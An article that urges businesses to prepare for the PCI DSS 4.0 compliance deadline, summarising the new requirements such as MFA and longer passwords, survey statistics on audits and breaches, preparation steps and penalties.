We are merely days away from the March 31 deadline for PCI DSS compliance. While it’s an exciting move toward a more secure future, the transition from PCI DSS 3.2.1 to 4.0 is a heavy lift for many businesses, involving increased and more formalized risk assessment, multiple security mandates, data protection and privacy laws or regulations to protect payment data and reduce credit card fraud.
Compliance is also mandatory for financial institutions, online payment processors, merchants that accept payment cards and any organization that processes payment card transactions, stores or accesses payment card information and any service providers that enable business anywhere in the card processing ecosystem. In short, this is every business.
The importance of compliance to security measures
For those of you asking, “How important is compliance to security measures?” findings from the 2024 Thales Data Threat Report show that the answer is, “very.” The report finds that 93 percent of professionals believe security threats are increasing in volume or severity. Even so, 43 percent of enterprises failed a compliance audit in the past 12 months and 31 percent of those experienced a data breach in the same year. This compares to just 3 percent of those who passed compliance audits.
In addition, compliance with security standards adds an extra layer of trust for consumers. Just as users wouldn’t feel comfortable if a shop left their credit card information on a sticky note, PCI DSS ensures that businesses treat customer payment data with extra care, keeping it encrypted, well-protected and out of reach from anyone who shouldn’t have access to it. So, every time a customer buys something, PCI DSS is working behind the scenes to keep their financial information safe from digital “break-ins.”
On to the main question: Are you PCI compliant? For that, let’s first understand what it means to be 4.0 compliant.
Requirements for PCI DSS 4.0
PCI DSS 4.0 has updated from 3.2.1 to include new requirements relating to multi-factor authentication (MFA), password, ecommerce and security awareness. These include:
- An expansion of Requirement 8 to implement MFA for all access into the cardholder data environment.
- Updated password requirements, including increasing password length requirement from 8 characters to 12.
- Changing requirements around shared, group and generic accounts.
- Clearly defined roles and responsibilities needed for each requirement.
- New requirements to detect and prevent threats against the payment industry, including phishing, e-commerce and e-skimming attacks.
- Updated firewall terminology to network security controls to support a broader range of technologies used to meet the security objectives traditionally met by firewalls.
- Enhanced PCI DSS assessment reports and the option for organizations to complete partial assessments.
- Greater flexibility for organizations to define how frequently they perform certain activities and demonstrate how they are using different methods to achieve security objectives, as best suited to their business needs.
The technical complexity of the requirements has posed a significant challenge for organizations. Retailers are expected to comply with a set of entirely new criteria, much of which is brand new to the industry. There are many changes, transitions and objectives – and businesses that fail to meet these requirements will be faced with compliance delays and hefty fines. The good news is that with the PCI mandate, there will be more PCI-validated service providers for organizations to work with and reduce the burden of meeting compliance obligations.
Achieving PCI DSS 4.0 compliance
With the deadline fast approaching, businesses that haven’t already met the requirements should take the following steps to prepare for PCI DSS 4.0 compliance:
- Run a gap assessment: Review existing security measures to identify potential gaps that need improvement to meet PCI requirements. This includes evaluating third-party tools and vendors for compliance.
- Update relevant policies and practices: Ensure company systems support longer or diverse passwords and maintain encryption practices across sensitive data. It’s also important to set up automated monitoring tools for system logs to flag any threats or anomalies.
- Begin implementation immediately: Once the basics align, companies need to prioritize implementing the rules and practices required for compliance in order to meet the deadline.
- Prepare company employees: Everyone in the organization should be looped into the compliance requirements and given a thorough understanding of its scope, particularly regarding third-party scripts. Where specific technical expertise is needed, secure the relevant trusted partner internally or externally.
- Schedule regular reviews: Set up quarterly or annual monitoring and maintenance of hardware and software security controls to flag vulnerabilities.
Failure to comply can result in penalties, including fines ranging from US $5,000 to $100,000 per month, increased audit requirements and a potential shutdown of credit card activity by a merchant bank or credit card brand. These penalties depend on the volume of transactions, the level of PCI DSS that the merchant or service provider should be on and the time it has been non-compliant.
As we begin the countdown to compliance, adapting to these changes can be overwhelming. However, organizations that follow the above steps will be better positioned to meet the compliance deadline and uplevel their security ahead of new and growing threats that 2025 will likely bring.